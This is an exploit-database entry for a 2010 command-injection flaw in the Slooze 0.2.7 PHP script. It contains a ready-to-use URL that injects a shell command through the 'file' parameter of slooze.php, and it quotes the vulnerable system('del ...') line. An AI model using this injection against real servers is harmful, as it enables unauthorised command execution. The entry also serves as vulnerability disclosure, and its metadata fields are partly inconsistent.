header-logo
Suggest Exploit
vendor:
Slooze
by:
Sn!pEr.S!Te hacker
9,3
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Slooze
Affected Version From: 0.2.7
Affected Version To: 0.2.7
Patch Exists: YES
Related CWE: N/A
CPE: a:slooze:slooze:0.2.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

slooze.php Command Execution Vulnerability

A vulnerability exists in slooze.php, which allows an attacker to execute arbitrary commands on the vulnerable system. The vulnerability is due to insufficient sanitization of user-supplied input to the 'file' parameter. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable system. Successful exploitation of this vulnerability can result in arbitrary code execution on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to apply the patch as soon as possible.
Source

Exploit-DB raw data:

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
 0     _                   __           __       __                     1 
 1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
 1                  \ \____/ >>Remote Command Execution Vulnerability   0 
 0                   \/___/                                                                     1 
 1                                                                      1 
 0                               0 
 1                        1 
 0                                                                      0 
 1                    ########################################          1 
 0                                                         Sn!pEr Team          1 
 1                    ########################################          0 
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
  (slooze.php) Command Execution Vulnerability

 #[+] Author : Sn!pEr.S!Te hacker #
# [+] Email : sniper-site@HoTMaiL.coM #
# [+] T34M Sn!pEr.S!Te Hacker  #

#[+] Site            : www.v4-team.com/cc  and www.sa-hacker.com     
# [+] 5-5-2010                                 #
# [+] Script : slooze-0.2.7                   #
# [+] Download: http://sourceforge.net/projects/slooze/files/slooze/0.2.7/slooze-0.2.7.zip/download #
# Version: [0.2.7] #
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1#
Exploit :src/slooze.php
http://localhost/src/slooze.php?file= [your command]


http://127.0.0.1/src/slooz.php?file=[your command]
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1#

system('del "' . $this->cachePath . $file . '"');   /* Windows platforms */

line :1003

 

my  friend : liar -ysefe - Dj - sm hacker-baby hacker-dmar Hacker

Navigation

Suggest Exploit

Services By CQR